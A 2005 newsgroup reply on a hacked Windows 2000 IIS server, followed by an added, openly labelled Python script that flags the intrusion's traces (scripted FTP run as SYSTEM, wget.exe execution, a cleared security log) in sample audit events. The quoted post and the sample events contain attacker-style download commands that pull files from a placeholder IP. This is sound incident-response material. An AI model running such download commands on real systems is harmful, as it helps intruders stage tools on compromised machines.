Re: Server Hacked - Assessment and Prevention

From: Karl Levinson, mvp (levinson_k_at_despammed.com)
Date: 05/24/05

  • Next message: Roger Abell: "Re: Help! How do I see what OS management rights a Group has?"
    Date: Mon, 23 May 2005 20:48:03 -0400


    If your server was really fully patched, then I assume either a sub-optimal
    configuration or a different app that wasn't patched was the problem.
    Usually these compromises are done via well known issues. I recommend
    these:

    http://securityadmin.info/faq.asp#ftpfolder
    http://securityadmin.info/faq.asp#hacked
    http://securityadmin.info/faq.asp#harden

    "john d" <johnd@discussions.microsoft.com> wrote in message
    news:2027AC13-EF0B-4F7F-A2A1-C6A7143D0007@microsoft.com...
    > I have 2 Windows 2000 Server machines running IIS, which have been
    > compromised. I am trying to determine to what extent and, more importantly,
    > prevent this from reoccurring.
    >
    > I first noticed an issue because I received a virus alert from my Virus
    > scanning software on the servers indicating the following:
    >
    > The file C:\WINNT\system32\full.exe\000ae8a4.EXE is infected with
    > HackerDefender.sys Trojan. The file was successfully deleted. user NT
    > AUTHORITY\SYSTEM
    >
    > When I checked the server monitors, I found a command prompt open on the
    > screen, with the following:
    >
    >
    > C:\WINNT\system32>ftp -v -A -s:ftp.scr xxx.xxx.xxx.xxx
    > Anonymous login secceeded for SYSTEM@server1.domain.com
    > ftp>get wget.exe
    > ftp>
    >
    > (Note: I have replaced the hacker's IP in the message above with x's)
    >
    > I checked the security log and found that the intruder has cleared the
    > entries from that day. I have deleted ftp.scr from the server.
    >
    > How can I prevent this from reoccurring? How can I determine what, if any,
    > damage has been done?
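The intruder's footprint in the quoted post is a scripted FTP session (ftp -s:ftp.scr) launched under NT AUTHORITY\SYSTEM from system32, a download of wget.exe, a HackerDefender rootkit dropped on disk, and a cleared security log. The following is an added example that is not part of this thread or of any linked page: a small triage script that scans process-creation and log-clearing audit events for exactly those indicators. It assumes a constructed, simplified "key=value" event export (real Windows event dumps look different and would need their own parser), and the sample events, account names, paths and the 198.51.100.23 address are all made up for the example. The event IDs are the Windows 2000/2003 security-log numbers the poster's servers would have produced (592 = new process created, which requires "Audit process tracking" to be turned on; 517 = audit log cleared); on Vista and later the equivalents are 4688 and 1102.

```python
import re
from dataclasses import dataclass

# Constructed sample events in a simplified "EventID=... User=... Image=... Cmd=..." form
# (an assumption for this example, not a real Windows export format). Windows 2000/2003
# security-log IDs: 592 = new process created, 517 = the audit log was cleared.
SAMPLE_EVENTS = [
    "EventID=592 User=NT AUTHORITY\\SYSTEM Image=C:\\WINNT\\system32\\inetinfo.exe Cmd=inetinfo.exe",
    "EventID=592 User=NT AUTHORITY\\SYSTEM Image=C:\\WINNT\\system32\\cmd.exe Cmd=cmd.exe /c ftp -v -A -s:ftp.scr 198.51.100.23",
    "EventID=592 User=NT AUTHORITY\\SYSTEM Image=C:\\WINNT\\system32\\ftp.exe Cmd=ftp -v -A -s:ftp.scr 198.51.100.23",
    "EventID=592 User=NT AUTHORITY\\SYSTEM Image=C:\\WINNT\\system32\\wget.exe Cmd=wget.exe http://198.51.100.23/full.exe",
    "EventID=592 User=DOMAIN\\backupadmin Image=C:\\WINNT\\system32\\ftp.exe Cmd=ftp -s:nightly.scr backup.internal",
    "EventID=517 User=NT AUTHORITY\\SYSTEM Image= Cmd=",
]

EVENT_RE = re.compile(r"EventID=(\d+) User=(.*?) Image=(.*?) Cmd=(.*)$")
# ftp driven by a script file (-s:) is non-interactive: this is how the intruder
# pulled wget.exe onto the box in the quoted post.
SCRIPTED_FTP_RE = re.compile(r"\bftp(?:\.exe)?\b.*\s-s:", re.IGNORECASE)
# Download utilities Windows does not ship; wget.exe is the one named in the thread.
DOWNLOAD_TOOLS = {"wget.exe"}
SYSTEM_ACCOUNT = "NT AUTHORITY\\SYSTEM"


@dataclass
class Finding:
    index: int       # position of the event in the input list
    severity: str    # "high" or "medium"
    reason: str


def parse_event(line):
    """Split one constructed event line into its fields; None if it does not match."""
    m = EVENT_RE.match(line)
    if not m:
        return None
    event_id, user, image, cmd = m.groups()
    return {"id": int(event_id), "user": user, "image": image, "cmd": cmd}


def triage(lines):
    """Return the indicators of the thread's intrusion pattern found in the events."""
    findings = []
    for i, line in enumerate(lines):
        ev = parse_event(line)
        if ev is None:
            continue
        if ev["id"] == 517:
            # A cleared security log is itself the indicator; the host can no longer
            # answer "what happened", so other sources (IIS logs, firewall, the second
            # server) have to be correlated instead.
            findings.append(Finding(i, "high",
                "security log cleared (event 517); correlate with other log sources"))
            continue
        if ev["id"] != 592:
            continue
        basename = ev["image"].rsplit("\\", 1)[-1].lower()
        if SCRIPTED_FTP_RE.search(ev["cmd"]):
            # The web server's service context (SYSTEM here) has no business driving
            # ftp; an administrator's scheduled job is suspicious but less so.
            sev = "high" if ev["user"].upper() == SYSTEM_ACCOUNT else "medium"
            findings.append(Finding(i, sev,
                f"scripted ftp (-s:) run as {ev['user']}: {ev['cmd']}"))
        if basename in DOWNLOAD_TOOLS:
            findings.append(Finding(i, "high",
                f"non-native download tool executed: {ev['image']}"))
    return findings


if __name__ == "__main__":
    for f in triage(SAMPLE_EVENTS):
        print(f"[{f.severity}] event #{f.index}: {f.reason}")
```

Two caveats follow from the post itself. Process-tracking events only exist if that audit category was enabled before the intrusion, and once the log has been cleared the script can only tell you that it was cleared, so the IIS W3C logs and the second server's logs become the primary evidence. Second, HackerDefender is a kernel-mode rootkit that hides files, processes and registry keys from tools run on the live system, so a clean result from anything run on that host proves nothing; the usual answer, and the one the linked "hacked" FAQ gives, is to take the machine offline, preserve an image for analysis, and rebuild rather than clean.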

